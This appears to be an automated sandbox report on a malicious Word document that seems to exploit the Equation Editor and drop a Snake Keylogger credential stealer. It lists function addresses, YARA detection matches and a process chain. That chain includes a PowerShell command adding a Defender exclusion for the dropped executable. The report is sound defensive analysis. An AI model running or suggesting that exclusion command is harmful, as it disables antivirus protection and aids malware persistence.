Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058AA80 7_2_0058AA80
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00582680 7_2_00582680
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00580E87 7_2_00580E87
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058F8A0 7_2_0058F8A0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058C6A0 7_2_0058C6A0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058A750 7_2_0058A750
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00582B48 7_2_00582B48
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058BD40 7_2_0058BD40
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058EF40 7_2_0058EF40
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058D960 7_2_0058D960
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058A760 7_2_0058A760
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00581360 7_2_00581360
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00580508 7_2_00580508
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058E900 7_2_0058E900
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058B700 7_2_0058B700
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058D320 7_2_0058D320
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_005809D0 7_2_005809D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058C9C0 7_2_0058C9C0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058FBC0 7_2_0058FBC0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_005809C2 7_2_005809C2
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058E5E0 7_2_0058E5E0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058B3E0 7_2_0058B3E0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058C380 7_2_0058C380
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058F580 7_2_0058F580
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_005821B8 7_2_005821B8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058DFA0 7_2_0058DFA0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058ADA0 7_2_0058ADA0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_005839A0 7_2_005839A0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00620040 7_2_00620040
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062B760 7_2_0062B760
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062AA68 7_2_0062AA68
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062C468 7_2_0062C468
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00623D69 7_2_00623D69
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062B770 7_2_0062B770
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00623070 7_2_00623070
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00624A70 7_2_00624A70
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00623D78 7_2_00623D78
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062C478 7_2_0062C478
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062E978 7_2_0062E978
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00625778 7_2_00625778
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062DE78 7_2_0062DE78
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062F740 7_2_0062F740
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00626D40 7_2_00626D40
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00628740 7_2_00628740
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00627A48 7_2_00627A48
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00629448 7_2_00629448
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00628750 7_2_00628750
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00629458 7_2_00629458
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062AA59 7_2_0062AA59
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062305F 7_2_0062305F
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062C020 7_2_0062C020
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00623920 7_2_00623920
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00625320 7_2_00625320
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062CD28 7_2_0062CD28
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00624628 7_2_00624628
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00626028 7_2_00626028
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00625330 7_2_00625330
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062DA30 7_2_0062DA30
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00626D30 7_2_00626D30
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062F731 7_2_0062F731
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00626038 7_2_00626038
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00627A3E 7_2_00627A3E
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00629000 7_2_00629000
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00620006 7_2_00620006
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00629D08 7_2_00629D08
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062B308 7_2_0062B308
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062EE10 7_2_0062EE10
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00623910 7_2_00623910
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062C010 7_2_0062C010
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062461A 7_2_0062461A
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062B318 7_2_0062B318
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006268E2 7_2_006268E2
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00625BE0 7_2_00625BE0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062E4E0 7_2_0062E4E0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006268E8 7_2_006268E8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006275F0 7_2_006275F0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00628FF0 7_2_00628FF0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006282F6 7_2_006282F6
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006282F8 7_2_006282F8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062AEC0 7_2_0062AEC0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006241C0 7_2_006241C0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062C8C1 7_2_0062C8C1
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006234C8 7_2_006234C8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062BBC8 7_2_0062BBC8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00624ECE 7_2_00624ECE
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00625BD2 7_2_00625BD2
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062C8D0 7_2_0062C8D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006241D0 7_2_006241D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00624ED8 7_2_00624ED8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062D5D8 7_2_0062D5D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062FBD8 7_2_0062FBD8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006298A2 7_2_006298A2
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00627EA0 7_2_00627EA0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062F2A8 7_2_0062F2A8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00628BA8 7_2_00628BA8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006298B0 7_2_006298B0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062AEB0 7_2_0062AEB0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062BBB8 7_2_0062BBB8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006234B9 7_2_006234B9
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062D180 7_2_0062D180
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00624A80 7_2_00624A80
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00626480 7_2_00626480
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00625788 7_2_00625788
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0062DE88 7_2_0062DE88
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00627188 7_2_00627188
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00626490 7_2_00626490
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00627198 7_2_00627198
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00628B98 7_2_00628B98
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00627E9E 7_2_00627E9E
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00692E78 7_2_00692E78
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00690040 7_2_00690040
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00693558 7_2_00693558
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00693C38 7_2_00693C38
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00694318 7_2_00694318
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006949F8 7_2_006949F8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00690ED8 7_2_00690ED8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006950D8 7_2_006950D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006957B8 7_2_006957B8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00692E68 7_2_00692E68
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0069354A 7_2_0069354A
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00693C28 7_2_00693C28
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00692121 7_2_00692121
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00692130 7_2_00692130
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00694308 7_2_00694308
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00692B00 7_2_00692B00
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006949E9 7_2_006949E9
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00692AF2 7_2_00692AF2
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006950C8 7_2_006950C8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_006957A8 7_2_006957A8
Source: na.doc, type: SAMPLE Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: pKL9HXcZosWfPt1[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: cmnjgwhesilo61000.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, hxMIVi9pYAP9wjI5QI.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, hxMIVi9pYAP9wjI5QI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, mLeaogvoINC8aveRgP.cs Security API names: _0020.SetAccessControl
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, mLeaogvoINC8aveRgP.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, mLeaogvoINC8aveRgP.cs Security API names: _0020.AddAccessRule
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, hxMIVi9pYAP9wjI5QI.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, hxMIVi9pYAP9wjI5QI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, mLeaogvoINC8aveRgP.cs Security API names: _0020.SetAccessControl
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, mLeaogvoINC8aveRgP.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, mLeaogvoINC8aveRgP.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winDOC@9/14@26/9
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$na.doc
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRB5C7.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................'+.........................s............H............................... Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: na.doc ReversingLabs: Detection: 34%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: vcruntime140_clr0400.dll
